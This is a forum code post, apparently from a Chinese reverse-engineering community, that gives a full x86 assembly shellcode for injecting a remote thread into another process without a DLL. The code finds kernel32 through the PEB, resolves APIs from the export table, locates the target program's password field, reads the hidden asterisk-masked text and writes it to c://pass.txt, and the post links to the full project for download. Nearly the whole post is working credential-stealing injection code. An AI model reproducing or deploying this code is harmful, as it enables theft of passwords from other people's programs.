[代码]无DLL远程线程注入得到目标程序的星号密码


主体shellcode代码如下:

;module:rmtgetpass.asm
;get password by injecting remote thread
;29-Nov-2008 created by benyanwk

; writing this shellcode by hand was hard work,
; so I searched the book for a more reasonable
; method

; two method:
; (1) using dll file to inject
; (2) using advance shellcode technique
; should make a revision

.386
.model flat,stdcall
option casemap:none

;/////////////////////////////////
;///struct definition
;////////////////////////////////
IMAGE_EXPORT_DIRECTORY STRUCT
  Characteristics           DWORD      ?
  TimeDateStamp             DWORD      ?
  MajorVersion              WORD       ?
  MinorVersion              WORD       ?
  nName                     DWORD      ?
  nBase                     DWORD      ?
  NumberOfFunctions         DWORD      ?
  NumberOfNames             DWORD      ?
  AddressOfFunctions        DWORD      ?
  AddressOfNames            DWORD      ?
  AddressOfNameOrdinals     DWORD      ?
IMAGE_EXPORT_DIRECTORY ENDS

ST_PARAM STRUCT
 ApiAddress DWORD ?
 Pid DWORD ?
 pHwnd DWORD ?
ST_PARAM ENDS
 

;////////////////////////////////////
;///externs
;///////////////////////////////////


.code


_rmtGetPass proc LPARAM:DWORD

 ; get the password by remote thread
 ; using shellcode programming
 


   
;//////////////////////////////
;//shellcode's code
;//////////////////////////////
 
 ; first get the relocation difference

    call rebase
rebase:
    pop ebp;
    sub ebp,offset rebase;
   
    ; get the kernel32.dll's base address
    ; by PEB direct access
    ; place in here not routine
    ; because we need it after
   
    assume fs:nothing;

    mov eax,fs:[30h];   ptr _TEB
    mov eax,[eax+0ch];  ptr _PEB_LDR_DATA
    mov eax,[eax+1ch];  LIST_ENTRY InInitializationOrderModuleList.Flink
    mov eax,[eax];      Flink's Flink
    mov eax,[eax+08h];  the kernel32's base address
    mov [ebp+dwBase],eax;
    mov ecx,eax; the kernel base parameter
    ; get the two key api's address
   
    lea edi,[ebp+sGetProcAddress];
 lea eax,[ebp+getapiaddr];
    call eax; 
   
    add eax,[ebp+dwBase];
    mov [ebp+pGetProcAddress],eax;
   
    lea edi,[ebp+sLoadLibrary];
    lea eax,[ebp+getapiaddr];
    mov ecx,[ebp+dwBase];
    call eax;
   
    add eax,[ebp+dwBase];
    mov [ebp+pLoadLibrary],eax;

    ; get other api's address
    lea eax,[ebp+sWriteFile];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pWriteFile],eax;
   
    lea eax,[ebp+sCreateMailslot];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pCreateMailslot],eax
   
    lea eax,[ebp+sCreateFile];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pCreateFile],eax;
   
     lea eax,[ebp+sGetCurrentProcessId];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetCurrentProcessId],eax;
   
        lea eax,[ebp+sExitThread];
    push eax;;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pExitThread],eax;
   
    lea eax,[ebp+sSleep];
    push eax;
    push [ebp+dwBase];
    call [ebp+pGetProcAddress];
    mov [ebp+pSleep],eax;
   
    lea eax,[ebp+sUsrDll];
    push eax;

    call [ebp+pLoadLibrary];
    mov [ebp+dwBase2],eax;
            lea eax,[ebp+sGetWindowThreadProcessId];
    push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetWindowThreadProcessId],eax
               
    lea eax,[ebp+sGetWindowText];
    push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetWindowText],eax;
   
    lea eax,[ebp+sGetDlgItem];
    push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pGetDlgItem],eax;
   
 lea eax,[ebp+sEnumWindows];
 push eax;
    push [ebp+dwBase2];
    call [ebp+pGetProcAddress];
    mov [ebp+pEnumWindows],eax;
   
    ; get the process id
    call [ebp+pGetCurrentProcessId];
    mov [ebp+dwPid],eax;
   
    ; get the target's window p
   
 mov eax,[ebp+pGetWindowThreadProcessId];
 lea esi,[ebp+stParam];
 assume esi:ptr ST_PARAM;
 mov [esi].ApiAddress,eax; 
 mov eax,[ebp+dwPid];
 mov [esi].Pid,eax;
 lea eax,[ebp+hwnd];
 mov [esi].pHwnd,eax;
   
    push esi;
    lea eax,[ebp+enumproc]; enumwindowsproc
    push eax;
    call [ebp+pEnumWindows];
   
    ; we need the enumproc finished
    ; to make sure that we get the hwnd
    ; wait for 1 sec
   
   ; push 1000;
   ; call [ebp+pSleep];
   
    ; get the dialog item
    push IDC_PASS;
    push [ebp+hwnd];
    call [ebp+pGetDlgItem];
   
    ; get the window's password
    push 99;
    lea ebx,[ebp+pass];
    push ebx;
    push eax;
    call [ebp+pGetWindowText];
  
    push 0;
    push 80h; FILE_ATTRIBUTE_NORMAL
    push 2; CREATE_ALWAYS
    push 0;
    push 00000003h; FILE_SHARE_READ|FILE_SHARE_WRITE
    push 00000003h; FILE_READ_DATA|FILE_WRITE_DATA     ;GENERIC_READ|GENERIC_WRITE
    lea eax,[ebp+sFile];
    push eax;
    call [ebp+pCreateFile];
   
   
    push 0;
    lea ecx,[ebp+hwnd]; the return bytes
    push ecx;
    push 100;
    lea ecx,[ebp+pass];
    push ecx;
    push eax;
    call [ebp+pWriteFile];
   
 mov eax,0;
 add esp,4;
 db 0c3h;
   
;///////////////////////////////
;//data definition
;//////////////////////////////

;
; data definition should be placed here
; after the code
; because we need to code at the first
; so the exported symbol could be used
; as proc pointer correctly

 hwnd dd ?
 dwPid dd ?
 pass db 100 dup (?)
    IDC_PASS equ 1001
    dwBase dd ?
    dwBase2 dd ?
 pGetProcAddress dd ?
    pLoadLibrary dd ?
    sUsrDll db "user32.dll",0
    sKrlDll db "kerne32.dll",0
    sGetProcAddress db "GetProcAddress",0
    sLoadLibrary db "LoadLibraryA",0
    sEnumWindows db "EnumWindows",0
    sGetWindowText db "GetWindowTextA",0
    sGetWindowThreadProcessId db "GetWindowThreadProcessId",0
    sGetDlgItem db "GetDlgItem",0
    sCreateFile db "CreateFileA",0
    sWriteFile db "WriteFile",0
    sCreateMailslot db "CreateMailslotA",0
    sExitThread db "ExitThread",0
    sGetCurrentProcessId db "GetCurrentProcessId",0
    sSleep db "Sleep",0
   
    pCreateFile dd ?
    pGetCurrentProcessId dd ?
    pCreateMailslot dd ?
    pExitThread dd ?
    pGetWindowThreadProcessId dd ?
    pGetWindowText dd ?
    pGetDlgItem dd ?
    pEnumWindows dd ?
    pWriteFile dd ?
    pSleep dd ?
   
 sFile db "c://pass.txt",0
   
    stParam ST_PARAM <>
   
    ret
_rmtGetPass endp


getapiaddr:
; get kernel32.dll's api address
; pass argument using edi
; edi point to the api name
; ecx pass the kernel base address


    ; jmp to export directory table
    mov eax,ecx; get the kernel address
    add eax,[eax+3ch];  jmp to the PE signature
    mov eax,[eax+78h]; [rva] the export directory table address
    add eax,ecx;     [va] translate to va
   
    mov esi,eax
    push esi; the export table                   -4
    assume esi: PTR IMAGE_EXPORT_DIRECTORY
   
    ; jmp to name pointers array
   
    mov eax,[esi].AddressOfNames;   [rva] the name pointers address
    add eax,[ebp+dwBase];                 [va] translate to va
    mov ebx,eax;                    the name pointers base address
    push eax;
   
    ; get the api names lengths
    xor ecx,ecx; clear the counter
   
    push esi;         -8
    mov esi,edi;
get_len:
 inc ecx;
 mov al,byte ptr[esi];
 inc esi;
 test al,al;
 jnz get_len;
 
 pop esi; restore the esi;   -4
 
    ; search and match for the desired api
   
    push edi;       protect the desried api name  -8
    push ecx;  the api name length include null -c
find_name:  
    pop ecx;        get the same api name pointer
    pop edi;  api name length
    mov esi,[ebx];  [rva] the name address
    add esi,[ebp+dwBase]; [va] translate to va
    push edi;       protect the desried api name
    push ecx;  protect the api name length;
   @@:
   cmpsb;
    loopz @B;
    test ecx,ecx
    jz find_addr;
 
 
    add ebx,4;      else,loop till match the name
    jmp find_name;
   
find_addr:
    pop edi;                            balance the stack  -8
    pop edi;       balance the stack  -4
   
    pop eax;
    add ebx,4;     increment
    sub ebx,eax;                        get the name pointer diff
   
    ; jmp to the name ordinal table
    pop esi;                            get the export directory table -0
    mov eax,[esi].AddressOfNameOrdinals;[rva] name ordinals address
    add eax,[ebp+dwBase];                     [va] translate to base address
   
   
    ; get the name ordinal
    shr ebx,1;     div by 2
    add eax,ebx;
    mov ax,word ptr [eax];  length word
    and eax,0000ffffh;   clear the high word
   
    ; get the true ordianl
    sub eax,[esi].nBase;
   
    ; get the address
    shl eax,2;     mul by 4
    mov ebx,[esi].AddressOfFunctions;   [rva] function addresses address
    add ebx,[ebp+dwBase];                     [va] translate to va
   

    add ebx,eax;             
    mov eax,[ebx];
   
    ret
   
 

enumproc:
 ; in ss segment you can also use ds segment data
 ; but the relocation will dead.
 ; so we need to pass
 ; (1) the api address
 ; (2) the target's PID as parameter to the
 ; function as a struct pointer
 
 ; notice: this is a stdcall call convention function


 push ebx;  protect it;
 sub esp,4;
 push esp;      local dwPid
 push [esp+10h];  currnet hwnd
   
    mov ebx,[esp+18h]; the st pointer
    mov eax,ds:[ebx]; st.GetWindowThreadProcessId
 call eax;
 
 mov eax,[esp];
 cmp eax,ds:[ebx+4]; compare the pid
    jnz n;
   
 mov eax,[esp+0ch]; current hwnd
 mov ecx,[ebx+8]; st.phwnd
 mov ds:[ecx],eax; st.hwnd = current hwnd
 
    mov eax,0;
    add esp,4;  balance the stack
 pop ebx;
    retn 8;
n:
 add esp,4;
 pop ebx;
    mov eax,1;
    retn 8;
end

 

具体工程文件,请移步至:http://bbs.pediy.com/showthread.php?t=78032下载.

 
